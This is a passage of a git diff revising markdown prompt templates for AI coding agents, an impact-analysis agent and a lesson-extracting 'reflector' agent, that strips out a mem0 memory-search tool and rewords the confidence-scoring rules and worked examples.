mcp__mem0__map_tiered_search (comprehensive) ─┐ - └── 2. grep (extended) ─────────────────────────────┘ Parallel execution + └── grep (extended) + deepwiki/context7 as needed - Cross-validate all results - Flag disagreements ``` @@ -91,8 +82,7 @@ TIER 3 (Deep - 3-5 min): ``` MATCH (Category B: +0.15): - All tools identify same core affected files (±2 file variance) - Example: mem0=12 files, grep=13 files → MATCH + Multiple tools identify same core affected files (±2 file variance) SINGLE TOOL (Category B: +0.05): Only one tool ran successfully, results appear complete @@ -100,7 +90,6 @@ SINGLE TOOL (Category B: +0.05): CONFLICT (Category B: -0.10): >30% disagreement on affected components - Example: mem0=5 files, grep=15 files → CONFLICT Action: Trust grep (most literal), cap confidence at 0.60 ``` @@ -229,7 +218,7 @@ Before any analysis, classify the change to select appropriate depth: 2. Classify risk (usually "low") 3. Output JSON with confidence 0.9+ -**Skip**: mem0 tiered search, deepwiki +**Skip**: deepwiki, context7 ### Tier 2: STANDARD Analysis (1-2 minutes) **When to use**: @@ -240,12 +229,11 @@ Before any analysis, classify the change to select appropriate depth: - Configuration file changes **Process**: -1. mcp__mem0__map_tiered_search for patterns -2. grep for dependency analysis -3. Manual verification of edge cases -4. Risk classification +1. grep for dependency analysis +2. Manual verification of edge cases +3. 
Risk classification -**Use**: mcp__mem0__map_tiered_search + grep +**Use**: grep + manual verification ### Tier 3: DEEP Analysis (3-5 minutes) **When to use**: @@ -391,16 +379,6 @@ Example 3: Changed core/utils.py, import count = 25 **Current Subtask**: {{subtask_description}} -{{#if existing_patterns}} -## Relevant Historical Patterns - -The following patterns have been retrieved from memory (tiered search results): - -{{existing_patterns}} - -**Instructions**: Use these patterns to identify common dependency patterns and predict typical impact areas. -{{/if}} - {{#if feedback}} ## Previous Impact Analysis Feedback @@ -419,8 +397,7 @@ Previous analysis identified these concerns: **CRITICAL**: Accurate impact prediction requires historical data, dependency analysis, and architectural knowledge. MCP tools provide this context. -Impact analysis is about pattern recognition. Similar changes have happened before—renaming APIs, refactoring modules, changing schemas. MCP tools let us learn from history: -- mcp__mem0__map_tiered_search finds past breaking changes and migration patterns +Impact analysis is about pattern recognition. Similar changes have happened before--renaming APIs, refactoring modules, changing schemas. MCP tools let us learn from history: - deepwiki shows how mature projects handle similar changes - context7 validates library version compatibility @@ -432,60 +409,25 @@ Without these tools, we're guessing. With them, we're predicting based on eviden ``` BEFORE analyzing impact, gather context: -ALWAYS: - 1. FIRST → mcp__mem0__map_tiered_search (historical patterns) - - Query: "breaking change [change_type]" - - Query: "dependency impact [component_name]" - - Query: "migration strategy [similar_change]" - - Learn from past impact analyses - - Uses tiered retrieval: L1 recent → L2 frequent → L3 semantic - IF external library involved: - 2. THEN → get-library-docs (compatibility check) + 1. 
THEN → get-library-docs (compatibility check) - Query: Changes between versions (migration guides) - Identify deprecated APIs - Understand breaking changes in library updates IF architectural change: - 3. THEN → deepwiki (architectural precedents) + 2. THEN → deepwiki (architectural precedents) - Ask: "How do projects migrate from [old_pattern] to [new_pattern]?" - Learn typical ripple effects - Identify commonly missed dependencies -THEN → Grep/Glob (manual verification) - 4. Search for symbol names, import statements, file references +ALWAYS → Grep/Glob (manual verification) + 3. Search for symbol names, import statements, file references - Automated search might miss dynamic imports, reflection, config files - Manual search catches edge cases ``` -### 1. mcp__mem0__map_tiered_search -**Use When**: ALWAYS - before starting analysis -**Purpose**: Learn from past impact analyses and migration patterns - -**Rationale**: Most changes aren't novel. Someone has renamed a similar API, refactored a similar module, or changed a similar schema before. mem0 contains the outcomes—what broke, what migrations were needed, what was missed. - -**Tiered Retrieval Strategy**: -- **L1 (Recent)**: Last 7 days of similar changes -- **L2 (Frequent)**: Commonly accessed patterns (helpful_count >= 3) -- **L3 (Semantic)**: Deep semantic search for similar contexts - - -Before analyzing API rename impact: -- Search: "breaking change API rename" → find past API renames -- Search: "migration strategy function signature" → learn migration patterns -- Search: "dependency impact [module_name]" → understand this module's usage patterns -Use results to guide dependency tracing and risk assessment. - - - -Starting analysis with Grep immediately: -- Miss architectural context -- No historical precedent for risk assessment -- Repeat mistakes from past analyses -- Under-predict breaking changes - - -### 2. mcp__context7__get-library-docs +### 1. 
mcp__context7__get-library-docs **Use When**: Change involves external library or framework **Process**: 1. `resolve-library-id` with library name @@ -502,7 +444,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: **ALWAYS** check library docs for version changes. -### 3. mcp__deepwiki__read_wiki_structure + ask_question +### 2. mcp__deepwiki__read_wiki_structure + ask_question **Use When**: Architectural changes or unfamiliar patterns **Purpose**: Learn from mature projects' migration strategies @@ -513,7 +455,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: **Rationale**: Architectural changes have hidden complexity. How do you migrate thousands of database records? How do you version APIs without breaking clients? Mature projects have solved these problems—learn from them. -### 4. Standard Tools (Read, Grep, Glob, Bash) +### 3. Standard Tools (Read, Grep, Glob, Bash) **Use When**: Always—for verification and edge cases **Purpose**: Catch what automated tools miss @@ -533,7 +475,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: - String-based imports or reflection -### 6. mcp__sequential-thinking__sequentialthinking +### 4. mcp__sequential-thinking__sequentialthinking **Use When**: Complex dependency tracing requiring multi-step reasoning **Purpose**: Structure transitive dependency analysis and impact cascade tracing @@ -657,13 +599,8 @@ Thought 8: Assess deployment coordination needs and rollout timeline - Added/removed dependencies - Modified interfaces or contracts -### Phase 2: Historical Context -3. **Search mem0 for patterns** (mcp__mem0__map_tiered_search) - - Has this type of change happened before? - - What were the impacts? - - What did previous analyses miss? - -4. **Check library compatibility** (if external dependencies involved) +### Phase 2: Context Gathering +3. 
**Check library compatibility** (if external dependencies involved) - Breaking changes in library versions - Deprecation warnings - Migration requirements @@ -1063,13 +1000,7 @@ def get_weather(city: str, region: str) -> dict: ### Analysis Process -**Step 1: Historical context** (mcp__mem0__map_tiered_search) -- Query: "breaking change function signature" -- Result: Past signature changes required 3-5 updates per call site -- Query: "migration strategy required parameter" -- Result: Common pattern: add with default first, then make required - -**Step 2: Dependency analysis** (Grep) +**Step 1: Dependency analysis** (Grep) - Query: `grep -r "get_weather" --include="*.py"` - Result: ``` @@ -1080,7 +1011,7 @@ def get_weather(city: str, region: str) -> dict: scripts/daily_report.py:56: get_weather(config.default_city) ``` -**Step 3: Manual verification** (Grep) +**Step 2: Manual verification** (Grep) - Grep for `"get_weather"` in configs, docs: ```bash config/api_endpoints.yaml:12: - name: get_weather @@ -1088,16 +1019,16 @@ def get_weather(city: str, region: str) -> dict: README.md:78: weather = get_weather("Boston") ``` -**Step 4: Breaking change classification** +**Step 3: Breaking change classification** - Function signature change: **BREAKING** (added required parameter) - 5 direct call sites + 3 documentation references - Risk: HIGH (5-10 usage sites, breaking change) -**Step 5: Confidence assessment** -- Automated analysis: ✓ (all call sites found) -- Manual verification: ✓ (found doc references) -- Test coverage: ✓ (2 tests exist) -- Confidence: 0.85 (high—complete picture) +**Step 4: Confidence assessment** +- Automated analysis: completed (all call sites found) +- Manual verification: completed (found doc references) +- Test coverage: verified (2 tests exist) +- Confidence: 0.85 (high -- complete picture) ### Output (JSON) @@ -1106,7 +1037,7 @@ def get_weather(city: str, region: str) -> dict: "analysis_metadata": { "tier_selected": "2", "tier_rationale": 
"Internal function change with 5-10 affected files; standard analysis appropriate", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 75 }, "predicted_state": { @@ -1182,8 +1113,8 @@ def get_weather(city: str, region: str) -> dict: "score": 0.85, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 has similar patterns", "adjustment": 0.20}, - {"category": "B", "factor": "mem0 + grep match", "adjustment": 0.15}, + {"category": "A", "factor": "grep found comprehensive usage data", "adjustment": 0.20}, + {"category": "B", "factor": "grep results clear and complete", "adjustment": 0.15}, {"category": "C", "factor": "Static code (no flags)", "adjustment": 0.00}, {"category": "D", "factor": "Tests exist for affected files", "adjustment": 0.00} ], @@ -1322,12 +1253,7 @@ Reason: Better naming consistency with existing text_processing.py module ### Analysis Process -**Step 1: Historical context** (mcp__mem0__map_tiered_search) -- Query: "breaking change module rename" -- Result: Past module renames required import updates + config updates + CI/CD fixes -- Typical impact: 10-30 affected files - -**Step 2: Dependency analysis** (Grep) +**Step 1: Dependency analysis** (Grep) - Query: `grep -r "string_helpers" --include="*.py"` - Result: ``` @@ -1338,7 +1264,7 @@ Reason: Better naming consistency with existing text_processing.py module tests/integration/test_api.py:8: import utils.string_helpers as sh ``` -**Step 3: Manual verification** (Grep for string "string_helpers") +**Step 2: Manual verification** (Grep for string "string_helpers") - Found in: ``` .github/workflows/test.yml:15: - pytest tests/test_string_helpers.py @@ -1347,12 +1273,12 @@ Reason: Better naming consistency with existing text_processing.py module setup.py:25: "utils.string_helpers", ``` -**Step 4: Breaking change classification** +**Step 3: Breaking change classification** - Module path change: **BREAKING** (all imports 
break immediately) - 5 direct imports + 4 references in config/scripts - Risk: HIGH (module rename breaks all imports) -**Step 5: Confidence assessment** +**Step 4: Confidence assessment** - Automated analysis: ✓ (imports found) - Manual verification: ✓ (found configs, CI, setup.py) - Potential misses: dynamic imports, string references in unknown config files @@ -1365,7 +1291,7 @@ Reason: Better naming consistency with existing text_processing.py module "analysis_metadata": { "tier_selected": "3", "tier_rationale": "Module rename affects >10 files; Phase 2 grep found many importers; deep analysis required", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 180 }, "predicted_state": { @@ -1457,8 +1383,8 @@ Reason: Better naming consistency with existing text_processing.py module "score": 0.75, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 has similar module rename patterns", "adjustment": 0.20}, - {"category": "B", "factor": "mem0 + grep match on imports", "adjustment": 0.15}, + {"category": "A", "factor": "grep found comprehensive import data", "adjustment": 0.20}, + {"category": "B", "factor": "grep results verified manually", "adjustment": 0.15}, {"category": "C", "factor": "Potential dynamic imports (edge case)", "adjustment": -0.10}, {"category": "D", "factor": "Config/CI files not fully verifiable", "adjustment": 0.00} ], @@ -1623,8 +1549,8 @@ Risk is **not** just about quantity—it's about **criticality** of affected com **NEVER skip manual verification**: -- ❌ "mem0 search found all usages, we're done" → WRONG -- ✅ "mem0 found historical patterns, now Grep for: string references, configs, dynamic imports, docs" +- ❌ "Automated search found all usages, we're done" → WRONG +- ✅ "Initial search found patterns, now Grep for: string references, configs, dynamic imports, docs" Automated tools miss: - String-based references in YAML/JSON configs @@ -1686,7 +1612,7 @@ Return 
**ONLY** valid JSON in this exact structure: "analysis_metadata": { "tier_selected": "1|2|3", "tier_rationale": "Brief explanation of tier selection", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 45 }, "predicted_state": { @@ -1718,8 +1644,8 @@ Return **ONLY** valid JSON in this exact structure: "score": 0.85, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 comprehensive data", "adjustment": 0.20}, - {"category": "B", "factor": "mem0+grep match", "adjustment": 0.15} + {"category": "A", "factor": "Comprehensive grep data", "adjustment": 0.20}, + {"category": "B", "factor": "Results verified manually", "adjustment": 0.15} ], "flags": ["MANUAL REVIEW REQUIRED"] }, @@ -1841,19 +1767,19 @@ Confidence is NOT a guess—calculate it using this formula with **tier-specific ### Adjustment Categories (MUTEX - Pick ONE per Category) -**Category A: Historical Data** (pick highest applicable) +**Category A: Data Completeness** (pick highest applicable) ``` -+0.20: mem0 returned comprehensive patterns for this change type -+0.10: mem0 returned partial/similar patterns -+0.00: No query made (default for Tier 1) --0.15: mem0 queried but no relevant data found ++0.20: Comprehensive data found for this change type ++0.10: Partial/similar patterns found ++0.00: No additional context available (default for Tier 1) +-0.15: Queried but no relevant data found ``` **Category B: Tool Agreement** (pick one) ``` -+0.15: mem0 + grep results match (same usages found) ++0.15: Multiple verification methods match (same usages found) +0.05: Only one tool used, results clear --0.10: mem0 and grep conflict (investigate before proceeding) +-0.10: Tools conflict (investigate before proceeding) ``` **Category C: Code Analyzability** (pick lowest applicable) @@ -1871,8 +1797,8 @@ POSITIVE ADJUSTMENTS: → Verify: grep for corresponding test files, check test count > implementation functions +0.05: Manual verification 
completed all edge cases (from edge_cases section) → Verify: Each edge case checklist item explicitly checked -+0.05: Change matches documented pattern in existing_patterns - → Verify: Quote matching mem0 pattern in recommendation ++0.05: Change matches documented pattern in codebase + → Verify: Quote matching pattern in recommendation +0.05: Entities verified against provided context → Verify: All files in required_updates exist in files_changed or diff @@ -1911,8 +1837,8 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) | Factor | Category | Adjustment | Running Total | |--------|----------|------------|---------------| | Tier 2 base score | — | 0.50 | 0.50 | -| mem0 has similar patterns | A | +0.20 | 0.70 | -| Codex + grep match | B | +0.15 | 0.85 | +| Comprehensive data found | A | +0.20 | 0.70 | +| Multiple tools match | B | +0.15 | 0.85 | | Static code (no flags) | C | +0.00 | 0.85 | | High test coverage | D | +0.10 | 0.95 | | **Final** | capped | — | **0.95** | @@ -1922,7 +1848,7 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) | Factor | Category | Adjustment | Running Total | |--------|----------|------------|---------------| | Tier 3 base score | — | 0.50 | 0.50 | -| mem0 queried, no data | A | -0.15 | 0.35 | +| Queried, no data | A | -0.15 | 0.35 | | Only grep used | B | +0.05 | 0.40 | | Reflection detected | C | -0.20 | 0.20 | | External API undocumented | D | -0.10 | 0.10 | @@ -1945,28 +1871,6 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) **CRITICAL**: Tools can fail, time out, or return no results. Always have a fallback. -### If map_tiered_search fails or returns no results: -``` -1. Proceed with analysis using grep -2. Adjust confidence: -0.20 -3. Add to recommendation: "No historical data available for this change type" -4. Be MORE conservative with risk assessment (err on higher risk) -``` - -### If mem0 and grep results conflict: -``` -Example: mem0 finds 10 usages, grep finds 15 - -1. 
Trust manual verification (grep) over semantic tools -2. Investigate discrepancy: - - Check for dynamic imports - - Check for generated code - - Check for string-based references -3. Report BOTH numbers in output: - "affected_components": ["15 files (mem0: 10, grep: 15 - discrepancy noted)"] -4. Set confidence to max 0.60 (moderate uncertainty) -``` - ### If multiple tool results are contradictory: ``` 1. Flag in recommendation: "CONFLICTING SIGNALS detected" @@ -2008,7 +1912,7 @@ IF confidence < 0.30 after all adjustments: ### Catastrophic Tool Failure Protocol (All Tools Fail) -**CRITICAL**: If ALL tools fail (mem0 AND grep all error/timeout): +**CRITICAL**: If ALL tools fail (grep and all MCP tools error/timeout): ``` 1. DO NOT hallucinate results @@ -2020,7 +1924,6 @@ IF confidence < 0.30 after all adjustments: "tier_rationale": "All analysis tools failed - minimal analysis only", "tools_used": [], "tool_failures": { - "mem0": "timeout/error/unavailable", "grep": "timeout/error/unavailable" }, "catastrophic_failure": true diff --git a/src/mapify_cli/templates/agents/reflector.md b/src/mapify_cli/templates/agents/reflector.md index 719ad45..236cb48 100644 --- a/src/mapify_cli/templates/agents/reflector.md +++ b/src/mapify_cli/templates/agents/reflector.md @@ -1,6 +1,6 @@ --- name: reflector -description: Extracts structured lessons from successes and failures (ACE) +description: Extracts structured lessons from successes and failures model: sonnet version: 4.0.0 last_updated: 2026-01-12 @@ -11,7 +11,7 @@ last_updated: 2026-01-12 You are an expert learning analyst who extracts reusable patterns and insights from code implementations and their validation results. Your role is to identify root causes of both successes and failures, and formulate actionable lessons that prevent future mistakes and amplify successful patterns. -**Why Reflector Exists**: Critical to ACE (Automated Continuous Evolution) learning layer. 
Without systematic reflection, teams repeat mistakes and fail to amplify successful patterns. Reflection transforms experience into institutional knowledge by extracting patterns, not solutions. +**Why Reflector Exists**: Without systematic reflection, teams repeat mistakes and fail to amplify successful patterns. Reflection transforms experience into institutional knowledge by extracting patterns, not solutions. @@ -26,17 +26,11 @@ You are an expert learning analyst who extracts reusable patterns and insights f 1. Complex failure with multiple causes? → sequential-thinking for root cause analysis -2. Similar patterns encountered before? - → mcp__mem0__map_tiered_search to check existing lessons (with tier inheritance) - -3. Error involves library/framework misuse? +2. Error involves library/framework misuse? → context7 (resolve-library-id → get-library-docs) -4. How do production systems handle this? +3. How do production systems handle this? → deepwiki (read_wiki_structure → ask_question) - -5. High-quality pattern worth saving cross-project? - → Curator will handle via mcp__mem0__map_promote_pattern ``` ### Tool Usage Guidelines @@ -46,21 +40,6 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Query: "Analyze why [error] in [context]. 
Trace: trigger → conditions → design → principle → lesson" - Why: Prevents shallow analysis (symptom vs root cause) -**mcp__mem0__map_tiered_search** (PRIMARY SEARCH TOOL) -- Use when: Starting reflection, validating novelty, finding related patterns -- Query patterns: "error pattern [type]", "success pattern [feature]", "root cause [technology]" -- Parameters: - - query: Search query - - user_id: "org:{{org_name}}" (org-level search) - - run_id: "proj:{{project_name}}:branch:{{branch_name}}" (branch scope) - - include_archived: false (default, exclude deprecated patterns) -- Returns: Results with tier labels (branch → project → org inheritance) -- Why: Avoid re-learning known lessons, reference existing patterns with tier context - -**mcp__mem0__search_memories** (FALLBACK) -- Use when: Simple search without tier inheritance needed -- Why: Faster for single-tier searches - **mcp__context7__resolve-library-id + get-library-docs** - Use when: Library API misuse, verify usage patterns, recommend API changes - Process: resolve-library-id → get-library-docs with topic @@ -72,8 +51,8 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Why: Ground recommendations in battle-tested patterns -**ALWAYS**: Search mem0 FIRST with tiered search, use sequential-thinking for complex failures, verify library usage with context7 -**NEVER**: Skip MCP tools, recommend patterns without checking existence, suggest APIs without verifying docs +**ALWAYS**: Use sequential-thinking for complex failures, verify library usage with context7 +**NEVER**: Skip MCP tools, suggest APIs without verifying docs @@ -89,11 +68,10 @@ You are an expert learning analyst who extracts reusable patterns and insights f - No async/concurrency issues ``` -1. CHECK mem0 (30s): mcp__mem0__map_tiered_search with "error [type]" OR "success [pattern]" -2. CLASSIFY: SUCCESS (≥8.0) | FAILURE (<6.0) | PARTIAL (6-8) -3. IDENTIFY: One line/function/API -4. 
ROOT CAUSE: One-sentence principle violated/followed -5. OUTPUT: Standard JSON, suggested_new_bullets=[] if duplicate found in any tier +1. CLASSIFY: SUCCESS (≥8.0) | FAILURE (<6.0) | PARTIAL (6-8) +2. IDENTIFY: One line/function/API +3. ROOT CAUSE: One-sentence principle violated/followed +4. OUTPUT: Standard JSON ``` ### Full Framework Path (2-5 min) - Use When: @@ -101,7 +79,6 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Partial success (6-8 score range) - Security-related patterns - Async, concurrency, or distributed issues -- mem0 tiered search finds no existing patterns in any tier - Complex failure requiring 5 Whys @@ -115,7 +92,6 @@ Execute frameworks in this sequence: ``` ┌─────────────────────────────────────────────────────────────┐ │ 1. MCP TOOLS (First - before analysis) │ -│ - mcp__mem0__map_tiered_search (ALWAYS - deduplication) │ │ - sequential-thinking (IF complex failure) │ │ - context7 (IF library/API issue) │ ├─────────────────────────────────────────────────────────────┤ @@ -130,9 +106,8 @@ Execute frameworks in this sequence: │ Output: Section classification │ │ Priority: SECURITY > CORRECTNESS > PERFORMANCE > OTHER │ ├─────────────────────────────────────────────────────────────┤ -│ 5. DEDUPLICATION (Bullet Update Strategy) │ -│ Use mem0 tiered search results from Step 1 │ -│ Check all tiers (branch → project → org) │ +│ 5. QUALITY CHECK (Bullet Suggestion) │ +│ Check if pattern is genuinely new │ │ UPDATE existing OR CREATE new (never both for same) │ ├─────────────────────────────────────────────────────────────┤ │ 6. 
QUALITY GATE (Bullet Suggestion Quality) │ @@ -165,13 +140,6 @@ When multiple patterns detected, extract in order (max 3 per reflection): - **Language**: {{language}} - **Framework**: {{framework}} -## mem0 Tier Context - -When searching for existing patterns, use tiered namespaces: -- **Branch tier**: `run_id="proj:{{project_name}}:branch:{{branch_name}}"` (most specific) -- **Project tier**: `run_id="proj:{{project_name}}"` (shared across branches) -- **Org tier**: `user_id="org:{{org_name}}"` only (shared across all projects) - ## Input Data **Subtask Context**: @@ -260,13 +228,11 @@ Stream Handling: Errors not captured → "Check stdout AND stderr" (result.stdou ### Step 3: Bullet Update Strategy ``` -IF similar pattern exists in any mem0 tier (branch/project/org): - → UPDATE operation (increment helpful_count), reference memory_id, NO suggested_new_bullets - → Note which tier the pattern was found in +IF similar pattern already exists: + → UPDATE operation (increment helpful_count), reference ID, NO suggested_new_bullets -ELSE IF genuinely new (not found in any tier): +ELSE IF genuinely new: → suggested_new_bullets, link related_to, ensure >=100 chars + code example - → Curator will determine appropriate tier for storage IF Actor used pattern and helped: bullet_updates tag="helpful" IF Actor used pattern and caused problems: bullet_updates tag="harmful" + suggested_new_bullets @@ -305,7 +271,7 @@ IF no actionable prevention → REFINE (enable systematic prevention) [ ] Root Cause Depth - Beyond symptoms? 5 Whys? Principle violated? Sequential-thinking for complex cases? [ ] Evidence-Based - Code/data support? Specific lines? Error messages? Metrics? NOT assumptions? [ ] Alternative Hypotheses - 2-3 causes considered? Evidence evaluated? Why this explanation? -[ ] mem0 Search - Called mcp__mem0__map_tiered_search? Checked all tiers? Create ONLY if novel? +[ ] Novelty Check - Is this pattern genuinely new? Create ONLY if novel? 
[ ] Generalization - Reusable beyond case? NOT file-specific? "When X, always Y because Z"? [ ] Action Specificity - Concrete code (5+ lines)? Incorrect + correct? Specific APIs? NOT vague? [ ] Technology Grounding - Language syntax? Project libraries? Context7 verified? NOT platitudes? @@ -313,7 +279,7 @@ IF no actionable prevention → REFINE (enable systematic prevention) ``` **Unified Quality Checklist**: -The checklist above combines both reflection depth (root cause, evidence, mem0 tiered search) and content quality (specificity, technology grounding, code examples) into a single systematic framework. +The checklist above combines both reflection depth (root cause, evidence, novelty check) and content quality (specificity, technology grounding, code examples) into a single systematic framework. Apply ALL items during analysis - depth items (Root Cause, Evidence, Alternatives) guide thinking, quality items (Action Specificity, Technology Grounding) ensure actionable output. @@ -378,18 +344,13 @@ IF execution_outcome = success AND no notable new patterns: → Check: Did existing bullets guide Actor? Was task trivial? 
→ IF trivial: "Standard implementation, no novel learning" → IF bullets helped: bullet_updates with "helpful" tags, suggested_new_bullets = [] - → key_insight: "Existing mem0 patterns validated for [use case]" + → key_insight: "Existing patterns validated for [use case]" ``` ## Tool Edge Cases **E5: MCP Tool Timeout or Failure** ``` -IF mcp__mem0__map_tiered_search fails/times out: - → Proceed with analysis, add "unverified_novelty": true to output - → Note in reasoning: "mem0 unavailable; manual deduplication required" - → Curator will verify novelty before applying - IF sequential-thinking exceeds 2 minutes: → Terminate and use partial result → Flag in reasoning: "Analysis incomplete due to complexity" @@ -400,21 +361,6 @@ IF context7 cannot resolve library: → Note: "Official docs unavailable, used community sources" ``` -**E6: mem0 Search Returns Too Many or Conflicting Results** -``` -IF mcp__mem0__map_tiered_search returns > 10 results: - → Narrow query with more specific terms - → If still too many: Take top 5 by relevance - → Note in reasoning: "Multiple existing patterns; referenced most relevant" - → Include tier labels in analysis (e.g., "Found in project tier") - -IF mem0 returns contradictory patterns across tiers: - → Note conflict in reasoning with tier context - → Higher tiers (org) are generally more vetted - → Lower tiers (branch) may have newer/unvalidated patterns - → Suggest pattern update to resolve ambiguity via Curator -``` - ## Output Edge Cases **E7: Cannot Formulate "When X, always Y because Z"** @@ -539,7 +485,7 @@ Skip if: trivial fix, no technical knowledge, no clear entities. 
- **correct_approach** (REQUIRED, ≥150 chars, 5+ lines): Incorrect + correct code, why works, principle, {{language}} syntax - **key_insight** (REQUIRED, ≥50 chars): "When X, always Y because Z", actionable, memorable - **bullet_updates** (OPTIONAL): Only if Actor used bullets, tag helpful/harmful with reason -- **suggested_new_bullets** (OPTIONAL): Only if new (check mem0), meet quality framework, code_example for SECURITY/IMPL/PERF +- **suggested_new_bullets** (OPTIONAL): Only if genuinely new, meet quality framework, code_example for SECURITY/IMPL/PERF ## JSON Schema (For Validation) @@ -610,7 +556,7 @@ Skip if: trivial fix, no technical knowledge, no clear entities. }, "unverified_novelty": { "type": "boolean", - "description": "Set to true if mem0 was unavailable during analysis" + "description": "Set to true if novelty could not be verified during analysis" }, "error": { "type": "boolean", @@ -700,7 +646,7 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Achieved 9.0 overall (10/10 performance) via Redis caching decorator. Success factors: 1) Hierarchical keys (user:123:profile) enable pattern invalidation, 2) Decorator pattern = reusable, 3) TTL (1h) balances freshness/performance, 4) JSON serialization handles complex objects. Shows understanding: cache reads not writes, TTL prevents stale data, graceful failures. mem0 tiered search confirms Redis best practices (found in org tier). Reusable lesson: decorator pattern for cross-cutting concerns - separates caching from business logic (SRP).", + "reasoning": "Achieved 9.0 overall (10/10 performance) via Redis caching decorator. Success factors: 1) Hierarchical keys (user:123:profile) enable pattern invalidation, 2) Decorator pattern = reusable, 3) TTL (1h) balances freshness/performance, 4) JSON serialization handles complex objects. Shows understanding: cache reads not writes, TTL prevents stale data, graceful failures. 
Follows Redis best practices. Reusable lesson: decorator pattern for cross-cutting concerns - separates caching from business logic (SRP).", "error_identification": "No errors. Decorator handles hits (return cached) and misses (fetch, populate). Hierarchical keys (user:{id}:profile) enable smart invalidation. TTL prevents indefinite stale data. 10/10 performance score.", @@ -732,7 +678,7 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Partial success (6.5/10) reveals subtle async issue. Implementation works in isolated tests but fails under concurrent load. Sequential-thinking analysis: 1) Tests pass individually, 2) Production has concurrent requests, 3) Shared mutable state (self.results dict) accessed without locks, 4) Race condition: multiple coroutines modify dict simultaneously, 5) Root principle: async != thread-safe; shared state needs synchronization. Success factors: correct async/await usage, proper error handling. Failure factor: assumed async execution was sequential. mem0 tiered search found 'async-0023' in project tier discussing similar pattern.", + "reasoning": "Partial success (6.5/10) reveals subtle async issue. Implementation works in isolated tests but fails under concurrent load. Sequential-thinking analysis: 1) Tests pass individually, 2) Production has concurrent requests, 3) Shared mutable state (self.results dict) accessed without locks, 4) Race condition: multiple coroutines modify dict simultaneously, 5) Root principle: async != thread-safe; shared state needs synchronization. Success factors: correct async/await usage, proper error handling. Failure factor: assumed async execution was sequential.", "error_identification": "BatchProcessor.process_items() lines 15-22: self.results[item.id] = result modifies shared dict from multiple coroutines. Works in tests (sequential) but races in production (concurrent). 
Monitor PASS (no security), Evaluator 6.5/10 (reliability issues).", @@ -770,15 +716,15 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Successful REST implementation following established patterns. mem0 tiered search for 'REST endpoint validation' returns 5 existing patterns across tiers: input validation (rest-0012, project tier), error responses (rest-0015, org tier), async handling (rest-0018, project tier), authentication (rest-0021, org tier), rate limiting (rest-0024, org tier). Actor correctly applied these patterns - no novel learning. Success validates existing pattern completeness for standard REST patterns. Creating new pattern would duplicate rest-0012 content.", + "reasoning": "Successful REST implementation following established patterns. Actor correctly applied standard patterns for input validation, error responses, async handling, and authentication - no novel learning. Success validates existing pattern completeness for standard REST patterns.", "error_identification": "No errors. Implementation correctly: validates input with Pydantic (rest-0012), returns proper HTTP status codes (rest-0015), uses async/await consistently (rest-0018), checks JWT auth (rest-0021). All existing patterns applied correctly.", - "root_cause_analysis": "Success root cause: Actor followed established REST patterns from mem0. Patterns rest-0012 through rest-0024 provided comprehensive guidance. No novel decisions required - standard CRUD operation. This validates pattern coverage, not new learning opportunity.", + "root_cause_analysis": "Success root cause: Actor followed established REST patterns. Standard patterns provided comprehensive guidance. No novel decisions required - standard CRUD operation. This validates pattern coverage, not new learning opportunity.", "correct_approach": "Implementation follows existing patterns correctly. 
No correction needed.\n\n```python\n# Actor's implementation (correct)\n@router.post('/users', response_model=UserResponse)\nasync def create_user(user: UserCreate, db: AsyncSession = Depends(get_db)):\n # Validates via Pydantic (rest-0012)\n existing = await db.execute(select(User).where(User.email == user.email))\n if existing.scalar():\n raise HTTPException(status_code=409, detail='Email exists') # rest-0015\n new_user = User(**user.dict())\n db.add(new_user)\n await db.commit() # rest-0018\n return new_user\n```", - "key_insight": "When existing mem0 patterns comprehensively cover a pattern, successful application validates coverage rather than generating new patterns. Reflection value here is confirming pattern coverage, not creating redundant entries.", + "key_insight": "When existing patterns comprehensively cover a use case, successful application validates coverage rather than generating new patterns. Reflection value here is confirming pattern coverage, not creating redundant entries.", "bullet_updates": [ {"bullet_id": "rest-0012", "tag": "helpful", "reason": "Pydantic validation pattern correctly applied"}, @@ -805,14 +751,13 @@ Use {{language}}/{{framework}} syntax. 
Show specific library, configuration, exp - Provide generic advice without code ("best practices" useless) - Output markdown formatting (raw JSON only, no ```json```) - Make assumptions about unprovided code (analyze actual code) -- Create suggested_new_bullets without mem0 tiered search (avoid duplicates) +- Create suggested_new_bullets without checking for existing duplicates - Tag bullets without evidence (must be used in actor_code) - Forget minimum lengths (reasoning≥200, correct_approach≥150, key_insight≥50) ## What Reflector ALWAYS Does -- Use MCP tools (sequential-thinking complex, mem0 tiered search) -- Call mcp__mem0__map_tiered_search FIRST to check all tiers +- Use MCP tools (sequential-thinking for complex cases, context7 for libraries) - Perform 5 Whys root cause (beyond symptoms) - Include code examples (5+ lines, incorrect + correct) - Ground in {{language}}/{{framework}} (specific syntax) @@ -820,19 +765,18 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp - Check suggested_new_bullets quality (100+ chars, code for impl/sec/perf) - Validate JSON before returning (required fields, structure) - Reference specific lines/functions in error_identification -- Note tier context when referencing existing patterns -Reflector's job is learning, not doing. Generic advice is unmemorable. Shallow analysis leads to repeat failures. JSON enables programmatic processing by Curator. +Reflector's job is learning, not doing. Generic advice is unmemorable. Shallow analysis leads to repeat failures. JSON enables programmatic processing. # VALIDATION CHECKLIST Before outputting: -- [ 